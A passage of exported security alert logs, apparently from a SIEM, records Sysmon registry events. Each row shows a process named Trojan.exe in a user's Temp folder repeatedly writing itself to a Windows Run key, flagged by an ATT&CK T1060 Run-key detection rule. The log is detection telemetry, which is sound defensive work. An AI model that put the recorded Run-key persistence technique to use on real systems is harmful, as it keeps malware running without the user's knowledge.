..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:44.155270200Z"",""eventRecordID"":""1852"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry 
value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:44.152\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:44.152"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:46.799",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:43.137 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:43.143974900Z"",""eventRecordID"":""1851"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:43.137\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:43.137"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:45.533",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:42.121 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:42.123879600Z"",""eventRecordID"":""1850"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:42.121\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:42.121"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:44.548",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:41.090 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:41.092564600Z"",""eventRecordID"":""1849"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:41.090\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:41.090"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:44.424",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:40.074 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:40.077019200Z"",""eventRecordID"":""1848"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:40.074\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:40.074"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:43.328",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:39.058 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:39.061399600Z"",""eventRecordID"":""1847"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:39.058\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:39.058"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:42.048",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:38.045 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:38.056010800Z"",""eventRecordID"":""1846"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:38.045\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:38.045"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:40.657",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:37.027 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:37.029172200Z"",""eventRecordID"":""1845"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:37.027\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:37.027"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:39.453",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:36.011 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:36.016327100Z"",""eventRecordID"":""1844"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:36.011\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:36.011"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:38.486",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:34.996 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:35.003054700Z"",""eventRecordID"":""1843"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:34.996\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:34.996"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:38.258",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:33.980 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:33.986443000Z"",""eventRecordID"":""1842"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:33.980\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:33.980"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:36.814",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:32.965 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 